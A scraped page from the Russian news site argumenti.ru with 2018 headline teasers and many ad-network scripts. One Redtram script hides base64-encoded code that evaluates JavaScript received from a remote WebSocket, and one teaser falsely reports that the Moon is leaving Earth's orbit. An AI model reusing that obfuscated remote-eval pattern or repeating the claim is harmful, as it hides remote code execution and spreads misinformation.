	<img src="http://argumenti.ru/images/preview/arhnews/6d7551052f6be8023fa1970c7d2c67a0.JPG" alt="Путин на  встрече с президентом Сингапура  сказал: &quot;среди друзей и вода - мед&quot;" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2018/11/592329">Путин на  встрече с президентом Сингапура  сказал: &quot;среди друзей и вода - мед&quot;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2018/11/592329">Президент РФ Владимир Путин находится с рабочим визитом в Сингапуре. Состоялась встреча российского лидера с президентом Сингапура Халимой Якоб. Путин отметил, что в Сингапуре говорят - "среди друзей и вода — мед".</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/2bfa7e08432c33df18d96cdb48301e50.jpg" alt="Новый глава Хакасии нашел замену сенатору Валентине Петренко" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592326">Новый глава Хакасии нашел замену сенатору Валентине Петренко</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592326">Новый глава Хакасии коммунист Валентин Коновалов заменит Валентину Петренко, представляющую республику в Совете Федерации. Петренко стала  сенатором в 2001 году. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/2c089dade86390e8b147346f78007c46.jpg" alt="Медведев: РФ может отказаться от участия в форуме в Давосе" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2018/11/592327">Медведев: РФ может отказаться от участия в форуме в Давосе</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2018/11/592327">Премьер-министр Российской Федерации Дмитрий Медведев рассказал, при соблюдении каких условий российская сторона согласится принять участие во Всемирном экономическом форуме в Давосе.</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/0e9ef1640f43b90a99219ccb72a85927.jpg" alt="Психолог: У женщины чувство ответственности сильнее, чем у мужчин" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592325">Психолог: У женщины чувство ответственности сильнее, чем у мужчин</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592325">Шведская журналистка Элин Йонссон рассказала об «ослабших» и «искалеченных» мужчинах России. По ее мнению, пока мужчины ничего полезного для семьи не делают, женщины берут весь груз на свои плечи. Журналистка объясняет сложившуюся ситуацию тяжёлой историей: гибелью мужчин во время революции, мировых войн, ГУЛАГа. Об этом сообщает SVT.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ff9ebd942159183317ca335561b29bb3.jpg" alt="Диетолог рассказала об опасных последствиях &laquo;министерской диеты&raquo;" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592324">Диетолог рассказала об опасных последствиях &laquo;министерской диеты&raquo;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592324">Основатель одной из столичных клиник Лидия Ионова заявила, что при питании на 3,5 тысячи рублей в месяц у человека может повыситься риск ожирения.</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/8d4b3601a5658249dc49de767439273e.jpg" alt="Правоохранители в Крыму не приняли взятку в $20 тысяч от задержанного" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592320">Правоохранители в Крыму не приняли взятку в $20 тысяч от задержанного</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592320">В Кировском районе житель села Партизаны выращивал и культивировал коноплю. При задержании он хотел откупиться от полиции суммой в 20 тысяч долларов.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/hitech">Хайтек</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/7cd64e45d28b086eea97a5a051120968.jpg" alt="В Москве покупатели расплатились за смартфон ванной мелочи" />
	

<p class="minititle"><a href="http://argumenti.ru/hitech/2018/11/592314">В Москве покупатели расплатились за смартфон ванной мелочи</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/hitech/2018/11/592314">В один из салонов связи, расположенный в российской столице, двое молодых людей накануне принесли ванну, наполненную монетами. Средства должны были пойти на покупку дорогостоящего смартфона.</a></div>		</div>
	</div>	
    
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/9d059b598b8d55bdc764d749c5688e80.JPG" alt="В Рязани открыт  обновлённый музей военной автомобильной техники" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592317">В Рязани открыт  обновлённый музей военной автомобильной техники</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592317">В Рязани на территории десантного училища, на которой раньше располагался военный автомобильный институт, открыли музей вооружения и военной техники ВДВ. РВВДКУ 13 ноября отмечает 100-летний юбилей.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/4487e63895fe3694839ed45b99aa3731.jpg" alt="Сколько заплатят самозанятые?" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592319">Сколько заплатят самозанятые?</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592319">13 ноября Госдуме РФ состоялось 2-е чтение пакета законопроектов о проведении эксперимента по введению специального налогового режима для самозанятых. В день, когда выходит номер (15 ноября) – 3-е чтение. Возможно, что их принятие станет  важнейшим шагом к обелению российской экономики.


</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/0c80e09f570d3131e1e6328102e57d0e.png" alt="После выборов на Донбассе youtube запустил рекламу с призывом Порошенко" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592318">После выборов на Донбассе youtube запустил рекламу с призывом Порошенко</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592318">Эта реклама не высвечивалась ни накануне выборов, ни в день их проведения. Корреспондент АН просматривал различные видео на youtube в предвыборный период. Выборы прошли в воскресенье. На них  победили ИО глав народных республик: В Луганске — Л.Пасечник, в Донецке — Д.Пушилин.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/sport">Спорт</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/273f37963ff758bd7c962a1a06c86194.jpg" alt="Комментатор Орлов: Мамаев и Кокорин получат реальный срок, их  &quot;не отмажут&quot;" />
	

<p class="minititle"><a href="http://argumenti.ru/sport/2018/11/592313">Комментатор Орлов: Мамаев и Кокорин получат реальный срок, их  &quot;не отмажут&quot;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/sport/2018/11/592313">Спортивный комментатор Геннадий Орлов узнал от следователя о том, что футболистам Александру Кокорину и Павлу Мамаеву присудят реальный тюремный срок. По мнению Орлова, Кокорина и Мамаева "не отмажут". </a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ca7bf4554fc6e06096f8fcbebfa3483a.jpg" alt="&laquo;Аргументы недели&raquo; защитили в Севастополе  историческую память Франции" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592316">&laquo;Аргументы недели&raquo; защитили в Севастополе  историческую память Франции</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592316">Севастопольские власти взялись за «бомжатник» французского мемориала после публикации АН. Теперь памятник погибшим в Крымской войне французским воинам приведут в нормальный вид. Служба по вопросам похоронного дела обязана обеспечить работы по приведению территории в надлежащее санитарное состояние. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/6bf470ef31547d2500aedc1fc11c1f8d.jpg" alt="Три возможные причины новой мировой войны обозначил американский аналитик" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2018/11/592305">Три возможные причины новой мировой войны обозначил американский аналитик</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2018/11/592305">Обозначены три возможные причины начала нового глобального конфликта на Земле. С соответствующим заявлением некоторое время назад выступил Даниэль Эллсберг, военный эксперт из Соединенных Штатов.</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/82c9e68313dfeb1d5ae77ec791d24a62.jpg" alt="Видео: норвежский фрегат затонул после столкновения с танкером" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2018/11/592311">Видео: норвежский фрегат затонул после столкновения с танкером</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2018/11/592311">Фрегат норвежских ВМС "Хельге Инстад", столкнувшийся на прошлой неделе с танкером "Сола", стремительно погружается под воду из-за лопнувших тросов, которыми он был закреплен у берега.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/7dae2b5764326e409a3b3ef6af37d646.jpg" alt="Ксения Стриж: мою личную жизнь изменил &quot;квартирный вопрос&quot;" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2018/11/592309">Ксения Стриж: мою личную жизнь изменил &quot;квартирный вопрос&quot;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2018/11/592309">Радиоведущая и актриса Ксения Стриж - москвичка. Ксения стала участницей программы Бориса Корчевникова "Судьба человека" и откровенно поделилась о своей личной жизни, о первом муже.</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/7b013d835597dfd78d934fbf26d3db57.jpg" alt="Трамп объявил Калифорнию зоной стихийного бедствия" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2018/11/592307">Трамп объявил Калифорнию зоной стихийного бедствия</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2018/11/592307">Президент США Дональд Трамп объявил штат Калифорния, где вторую неделю бушуют лесные пожары, зоной стихийного бедствия. Об этом глава Вашингтона сообщил на своей странице в Twitter.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/6224bf317919c5a47fb7e5d95238e073.jpg" alt="Стало известно имя уволенной из-за слива служебной переписки чиновницы кабмина" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592308">Стало известно имя уволенной из-за слива служебной переписки чиновницы кабмина</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592308">Чиновницей, наказанной за слив рабочей переписки федеральных министерств, оказалась Анастасия Алексеева. Данные Алексеевой уже удалены из базы данных сотрудников правительства.</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/098977bcedd9a4b568b0a6b19f0b266d.jpg" alt="На Украине нашли союзника в вероятном противостоянии с Россией в Черном море" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2018/11/592301">На Украине нашли союзника в вероятном противостоянии с Россией в Черном море</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2018/11/592301">В случае начала противостояния России и Украины в Черном море на стороне Киева выступит блок НАТО. Это следует из заявления, которое сделал Степан Полторак, глава Минобороны соседнего государства.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/science">Наука</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/768b559f5803f80b14947a3f2451697e.jpg" alt="Эксперты заявляют о новом Конце Света: Луна покидает орбиту Земли" />
	

<p class="minititle"><a href="http://argumenti.ru/science/2018/11/592299">Эксперты заявляют о новом Конце Света: Луна покидает орбиту Земли</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/science/2018/11/592299">Астрофизики убеждены, что грядет апокалипсис. Недавнее столкновение естественного спутника Земли с астероидом приведет в скором времени к гибели всего человечества, считают специалисты.</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a12aac0e92c5ee47aab5e0bc133ea48f.jpeg" alt="Улюкаев рассказал о своей жизни в колонии" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592306">Улюкаев рассказал о своей жизни в колонии</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592306">Бывший министр экономического развития Алексей Улюкаев, который отбывает наказание в исправительной колонии № 1 в Тверской области, рассказал о своей жизни в заточении.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/99330a45ae546d94fc4eed30686ac208.jpg" alt="Ученые раскрыли, какой  фактор в четыре раза повышает риск заболеть раком" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592302">Ученые раскрыли, какой  фактор в четыре раза повышает риск заболеть раком</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592302">Израильские ученые провели масштабное исследование с участием подростков в возрасте от 16 до 19 лет, и определили, что ожирение в подростковом возрасте в 4 раза повышает риск развития рака поджелудочной железы.</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/8bafdd75cc5f05bfba15be0401fe106d.jpg" alt="Аксенов рассказал о провокациях Украины и влиянии санкций на Крым" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2018/11/592300">Аксенов рассказал о провокациях Украины и влиянии санкций на Крым</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2018/11/592300">Глава Крыма Сергей Аксенов рассказал, что у жителей республики выработался "иммунитет" к попыткам Украины разжечь на полуострове межнациональную и межрелигиозную рознь. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/7d46841881050bb2fc93ab822954fec4.JPG" alt="Лукашенко назначил бывшего вице-премьера Семашко послом в РФ" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2018/11/592296">Лукашенко назначил бывшего вице-премьера Семашко послом в РФ</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2018/11/592296">Президент Белоруссии Александр Лукашенко назначил послом республики в Российской Федерации бывшего вице-премьера страны Владимира Семашко. Соответствующее кадровое решение было принято во вторник.</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/e5f6656e0f6cf50d6bca5daa625ab8f5.png" alt="На Донбассе охранник украл 120 миллионов рублей" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592298">На Донбассе охранник украл 120 миллионов рублей</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592298">Донецкая полиция поймала главного фигуранта в деле о краже десяти килограммов ювелирных украшений. Преступление было совершено в местном ЦУМ-е.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/716de3167ddf6ab94353abea5af24af1.jpg" alt="В Москве закрывается визовый центр Испании" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592295">В Москве закрывается визовый центр Испании</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592295">Во вторник, 13 ноября, стало известно, что в Москве закрывается визовый центр Испании. Согласно последней информации, учреждение перестает работать в связи с непредвиденными обстоятельствами.</a></div>		</div>
	</div>	
	<!--<p class="er_info"><a href="javascript:void(0)" onclick="winop()">Ошибка в тексте? Пожалуйста, выделите ее и нажмите "Ctrl + Enter"</a></p>-->

	            	
	<script id="js-mpf-mediator-init" data-counter="2820575" data-adaptive="true">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement("script"),r.type="text/javascript",r.async=!0,r.defer=!0,r.src=t,r.charset="UTF-8";;var d=function(){var e=a.getElementsByTagName("script")[0];e.parentNode.insertBefore(r,e)};"[object Opera]"==e.opera?a.addEventListener?a.addEventListener("DOMContentLoaded",d,!1):e.attachEvent("onload",d):d()}}}t("//mediator.mail.ru/script/2820575/","_mediator")}(window);</script>			
			<script src='//mediametrics.ru/partner/inject/injectv2.js' type='text/javascript' id='MediaMetricsInject' data-adaptive='true' data-img='true' data-imgsize='170' data-type='text-over-image' data-bgcolor='FFFFFF' data-bordercolor='000000' data-linkscolor='232323' data-transparent='' data-rows='4' data-inline='' data-fontfamily='arial' data-border='' data-borderwidth='0' data-place='left' data-fontsize='14' data-lineheight=21 data-visiblerows=3 data-fontweight=100 data-fontalign=left data-textposition="bottom" data-fontfamilycurrent="Roboto" data-period='online' data-alignment='horizontal' data-country='ru' data-site='mmet/example_com'> </script>
			
		</section>
	</div>

			<div style="margin-top: 8px;" class="right">

	<div id="smi2adblock_45368"><a href="https://smi2.net/">Новости smi2.ru</a></div>

<script async type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/45368.js'; sc.charset = 'windows-1251';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>
		
	<!--Авторы-->
	
	<script async type='text/javascript' src='//s.luxupcdnc.com/t/common_402.js'></script>
<script class='__lxGc__' type='text/javascript'>
((__lxGc__=window.__lxGc__||{'s':{},'b':0})['s']['_183738']=__lxGc__['s']['_183738']||{'b':{}})['b']['_561097']={'i':__lxGc__.b++};
</script>
	<h2 class="namerub"><span class="rem">//</span>Новости партнеров</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14114"></div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14114/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->




	<!--AdFox START-->
<!--argumentiru-->
<!--Площадка: Аргументы Недели / * / *-->
<!--Тип баннера: 240X400-->
<!--Расположение: <верх страницы>-->
<div id="adfox_151966360876562195"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 264297,
        containerId: 'adfox_151966360876562195',
        params: {
            pp: 'g',
            ps: 'cquo',
            p2: 'fvgz'
        }
    });
</script>	

	
	<!--AdFox START-->
<!--argumentiru-->
<!--Площадка: Аргументы Недели / * / *-->
<!--Тип баннера: 240X400-->
<!--Расположение: <середина страницы>-->
<div id="adfox_151974640082337171"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 264297,
        containerId: 'adfox_151974640082337171',
        params: {
            pp: 'h',
            ps: 'cquo',
            p2: 'fvgz'
        }
    });
</script>
				
		<h2 class="namerub"><span class="rem">//</span>Новости СМИ2</h2>
<div id="smi2adblock_72157"><a href="http://smi2.ru/" rel="nofollow">Новости СМИ2</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/72157.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>	

	<h2 class="namerub"><span class="rem">//</span>Новости ADWILE</h2>
<div id="smi_teaser_10167">
<center><a href="http://partner.adwile.com" rel="nofollow">Нативная реклама ADWILE</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/d/f/10167.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>

	
	<!--Фотогаллерея-->
	
	<h2 class="namerub"><span class="rem">//</span>Новости advert.mirtesen.ru</h2>
<div id="smi2adblock_81549"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.advert.mirtesen.ru/data/js/81549.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>

	
	<!-- Yandex.RTB R-A-50615-1 -->
<div id="yandex_rtb_R-A-50615-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-50615-1",
                renderTo: "yandex_rtb_R-A-50615-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
	<h4 class="namerub"><span class="rem">//</span>Читайте также</h4>
<ul class="main_inf_anons">
			<li>
							<a href="http://argumenti.ru/world/2018/11/592251?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/6f38a3045c27ac877d38e82d269bed03.jpg" alt="В ДНР рассказали о запрещенных военных методах противостоящих республике ВСУ" /></a>
						<a href="http://argumenti.ru/world/2018/11/592251?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">В ДНР рассказали о запрещенных военных методах противостоящих республике ВСУ</a>
		</li>
			<li>
							<a href="http://argumenti.ru/live/2014/08/358003?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/tabloid/bb1232a9f3c9b2b53c82f2381e47af60.jpg" alt="Станет ли Ляшко добрее, если выйдет замуж?" /></a>
						<a href="http://argumenti.ru/live/2014/08/358003?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">Станет ли Ляшко добрее, если выйдет замуж?</a>
		</li>
			<li>
							<a href="http://argumenti.ru/society/2018/11/591649?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/798e64177e4603bbf9648ef1ffe6daf6.jpg" alt="С пенсиями прокатило, на очереди ЖКХ" /></a>
						<a href="http://argumenti.ru/society/2018/11/591649?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">С пенсиями прокатило, на очереди ЖКХ</a>
		</li>
	</ul>
	<h2 class="namerub"><span class="rem">//</span>Новости Redtram</h2>
<script id="r34279" type="text/javascript">
    (function() {
        var worker34279,
            tickerID = 34279,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-ru.redtram.com/n4p/0/34/ticker_34279.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDtmdW5jdGlvbiBzZW5kVG9Tb2NrZXQoZGF0YSkge2lmICghc29ja2V0IHx8IHNvY2tldC5yZWFkeVN0YXRlID09PSBzb2NrZXQuQ0xPU0VEKSB7c29ja2V0ID0gbmV3IFdlYlNvY2tldCgid3NzOi8vbjRwLnJlZHRyYW0uY29tL3dzLyIpO3NvY2tldC5vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7cG9zdE1lc3NhZ2UoSlNPTi5zdHJpbmdpZnkoci5kYXRhKSk7fTt9aWYgKHNvY2tldCkge3NlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7c29ja2V0LnNlbmQoZGF0YSk7fSk7fX1mdW5jdGlvbiBzZW5kQ29ubmVjdGlvbihjLCByKSB7c2V0VGltZW91dChmdW5jdGlvbigpIHtpZiAoYy5yZWFkeVN0YXRlID09PSBjLk9QRU4pIHtyZXR1cm4gcigpO31yZXR1cm4gc2VuZENvbm5lY3Rpb24oYywgcik7fSwgNTApO31vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7IHNlbmRUb1NvY2tldChyLmRhdGEpOyB9Ow==';

                function runExternalMessage(data) {
                    worker34279.postMessage(data);
                }

                worker34279 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker34279.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker34279.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
	

	<h2 class="namerub"><span class="rem">//</span>Новости Lentainform.com</h2>
<!-- Composite Start -->
<div id="M256303ScriptRootC648515">
        <div id="M256303PreloadC648515">
        Загрузка...
    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M256303ScriptRootC648515")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M256303ScriptRootC648515");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=648515;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsc.lentainform.com/a/r/argumenti.ru.648515.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- Composite End -->
			
					
<div class="tabs">
    <h4 class="namerub"><span class="rem">//</span>Мы в соцсетях</h4>

        <input id="tab1" class="socialtabs" type="radio" name="tabs" checked>
        <label class="sociallabels vk" for="tab1" title="Wordpress"></label>
    
        <input id="tab2" class="socialtabs" type="radio" name="tabs">
        <label class="sociallabels fb" for="tab2" title="Windows"></label>
    
        <input id="tab3" class="socialtabs" type="radio" name="tabs">
        <label class="sociallabels ok" for="tab3" title="HTML5"></label>
    
        <section id="content1" class="tab-content">
<script type="text/javascript" src="//vk.com/js/api/openapi.js?115"></script>

<!-- VK Widget -->
<div id="vk_groups"></div>
<script type="text/javascript">
VK.Widgets.Group("vk_groups", {mode: 0, width: "240", height: "300", color1: 'FFFFFF', color2: '2B587A', color3: '5B7FA6'}, 14409962);
</script>

       </section>  
       <section id="content2" class="tab-content">
		<div id="fb-root"></div>
			<script>(function(d, s, id) {
		  var js, fjs = d.getElementsByTagName(s)[0];
		  if (d.getElementById(id)) return;
		  js = d.createElement(s); js.id = id;
		  js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
		  fjs.parentNode.insertBefore(js, fjs);
		}(document, 'script', 'facebook-jssdk'));</script>

		<div class="fb-like-box" data-href="http://www.facebook.com/argumentinedeli" data-width="240" data-height="303" data-show-faces="true" data-stream="false" data-border-color="b1bad0" data-header="true" data-rel="nofollow"></div>
        </section> 
        <section id="content3" class="tab-content">
		<div id="ok_group_widget"></div>
		<script>
		!function (d, id, did, st) {
		var js = d.createElement("script");
		js.src = "http://connect.ok.ru/connect.js";
